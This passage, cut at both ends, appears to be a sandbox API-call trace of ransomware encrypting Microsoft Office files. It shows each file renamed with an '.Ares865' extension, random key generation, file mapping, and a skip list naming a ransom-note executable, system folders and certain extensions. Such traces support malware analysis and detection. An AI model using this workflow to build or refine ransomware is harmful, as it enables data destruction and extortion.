"c:\\program files\\microsoft office\\office14\\oemprint.cat.ares865"), dwFlags=0x1) returned 1 [0065.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OEMPRINT.CAT.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\oemprint.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0065.702] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7321) returned 1 [0065.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0065.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.703] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0065.704] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0065.704] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0065.704] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1fa0, lpName=0x0) returned 0x12c [0065.705] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1fa0) returned 0x190000 [0065.749] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0065.750] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0065.750] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0065.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0065.751] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRM.XML.Ares865") returned 61 [0065.751] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\olkirm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\olkirm.xml.ares865"), dwFlags=0x1) returned 1 [0065.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\olkirm.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0065.826] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79692) returned 1 [0065.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0065.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.826] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0065.827] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0065.827] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0065.827] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a50, lpName=0x0) returned 0x12c [0065.915] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a50) returned 0x190000 [0066.078] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0066.078] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.078] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0066.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.080] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRMV.XML.Ares865") returned 62 [0066.080] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\olkirmv.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRMV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\olkirmv.xml.ares865"), dwFlags=0x1) returned 1 [0066.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OLKIRMV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\olkirmv.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0066.123] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79252) returned 1 [0066.123] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0066.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0066.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.124] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0066.125] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0066.125] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0066.125] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x138a0, lpName=0x0) returned 0x12c [0066.126] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x138a0) returned 0x190000 [0066.188] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0066.189] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.189] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.189] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.193] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\ONENOTEIRM.XML.Ares865") returned 65 [0066.193] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\ONENOTEIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\onenoteirm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\ONENOTEIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\onenoteirm.xml.ares865"), dwFlags=0x1) returned 1 [0066.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ONENOTEIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\onenoteirm.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.196] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=80116) returned 1 [0066.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0066.197] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.197] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0066.197] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0066.197] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0066.197] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.198] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13c00, lpName=0x0) returned 0x154 [0066.199] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13c00) returned 0x190000 [0066.305] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0066.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.352] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRM.XML.Ares865") returned 61 [0066.352] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pptirm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pptirm.xml.ares865"), dwFlags=0x1) returned 1 [0066.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pptirm.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.353] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79716) returned 1 [0066.353] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0066.354] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0066.355] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0066.355] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.355] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a70, lpName=0x0) returned 0x154 [0066.356] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a70) returned 0x420000 [0066.499] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0066.500] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.500] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0066.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0066.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0066.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0066.501] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.501] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0066.502] CloseHandle (hObject=0x154) returned 1 [0066.502] CloseHandle (hObject=0x164) returned 1 [0066.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0066.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0066.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.502] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x424a0a00, ftCreationTime.dwHighDateTime=0x1c9244d, ftLastAccessTime.dwLowDateTime=0x6d012810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x424a0a00, ftLastWriteTime.dwHighDateTime=0x1c9244d, nFileSizeHigh=0x0, nFileSizeLow=0x135b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PPTIRMV.XML", cAlternateFileName="")) returned 1 [0066.502] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.502] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="aoldtz.exe") returned 1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2=".") returned 1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="..") returned 1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="windows") returned -1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="bootmgr") returned 1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="temp") returned -1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="pagefile.sys") returned 1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="boot") returned 1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="ids.txt") returned 1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="ntuser.dat") returned 1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="perflogs") returned 1 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2="MSBuild") returned 1 [0066.503] lstrlenW (lpString="PPTIRMV.XML") returned 11 [0066.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRM.XML") returned 53 [0066.503] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="PPTIRMV.XML" | out: lpString1="PPTIRMV.XML") returned="PPTIRMV.XML" [0066.503] lstrlenW (lpString="PPTIRMV.XML") returned 11 [0066.503] lstrlenW (lpString="Ares865") returned 7 [0066.503] lstrcmpiW (lpString1="RMV.XML", lpString2="Ares865") returned 1 [0066.503] lstrlenW (lpString=".dll") returned 4 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2=".dll") returned 1 [0066.503] lstrlenW (lpString=".lnk") returned 4 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2=".lnk") returned 1 [0066.503] lstrlenW (lpString=".ini") returned 4 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2=".ini") returned 1 [0066.503] lstrlenW (lpString=".sys") returned 4 [0066.503] lstrcmpiW (lpString1="PPTIRMV.XML", lpString2=".sys") returned 1 [0066.503] lstrlenW (lpString="PPTIRMV.XML") returned 11 [0066.503] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRMV.XML.Ares865") returned 62 [0066.503] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pptirmv.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRMV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pptirmv.xml.ares865"), dwFlags=0x1) returned 1 [0066.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRMV.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pptirmv.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.554] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=79284) returned 1 [0066.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0066.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.554] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0066.554] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0066.555] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0066.555] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.555] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x138c0, lpName=0x0) returned 0x120 [0066.557] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x138c0) returned 0x190000 [0066.702] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0066.702] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.702] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0066.702] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0066.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.703] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.703] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0066.703] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.703] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0066.703] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.703] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0066.704] CloseHandle (hObject=0x120) returned 1 [0066.704] CloseHandle (hObject=0x164) returned 1 [0066.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0066.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0066.704] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0066.704] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a22a900, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd65451e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1a22a900, ftLastWriteTime.dwHighDateTime=0x1cb701e, nFileSizeHigh=0x0, nFileSizeLow=0x14988, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PROJIMPT.EXE", cAlternateFileName="")) returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="aoldtz.exe") returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2=".") returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="..") returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="windows") returned -1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="bootmgr") returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="temp") returned -1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="pagefile.sys") returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="boot") returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="ids.txt") returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="ntuser.dat") returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="perflogs") returned 1 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2="MSBuild") returned 1 [0066.705] lstrlenW (lpString="PROJIMPT.EXE") returned 12 [0066.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRMV.XML") returned 54 [0066.705] lstrcpyW (in: lpString1=0x2e2e8b6, lpString2="PROJIMPT.EXE" | out: lpString1="PROJIMPT.EXE") returned="PROJIMPT.EXE" [0066.705] lstrlenW (lpString="PROJIMPT.EXE") returned 12 [0066.705] lstrlenW (lpString="Ares865") returned 7 [0066.705] lstrcmpiW (lpString1="MPT.EXE", lpString2="Ares865") returned 1 [0066.705] lstrlenW (lpString=".dll") returned 4 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2=".dll") returned 1 [0066.705] lstrlenW (lpString=".lnk") returned 4 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2=".lnk") returned 1 [0066.705] lstrlenW (lpString=".ini") returned 4 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2=".ini") returned 1 [0066.705] lstrlenW (lpString=".sys") returned 4 [0066.705] lstrcmpiW (lpString1="PROJIMPT.EXE", lpString2=".sys") returned 1 [0066.705] lstrlenW (lpString="PROJIMPT.EXE") returned 12 [0066.722] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\SketchPadTestSchema.xml.Ares865") returned 74 [0066.722] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\SketchPadTestSchema.xml" (normalized: "c:\\program files\\microsoft office\\office14\\sketchpadtestschema.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\SketchPadTestSchema.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\sketchpadtestschema.xml.ares865"), dwFlags=0x1) returned 1 [0066.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\SketchPadTestSchema.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\sketchpadtestschema.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.730] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=103) returned 1 [0066.730] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.730] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0066.731] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.731] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0066.731] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0066.731] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.732] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x370, lpName=0x0) returned 0x120 [0066.740] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x370) returned 0x190000 [0066.741] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0066.742] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0066.742] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.742] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.742] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.742] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.742] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.742] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0066.742] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.742] HeapFree (in: hHeap=0x2b0000, 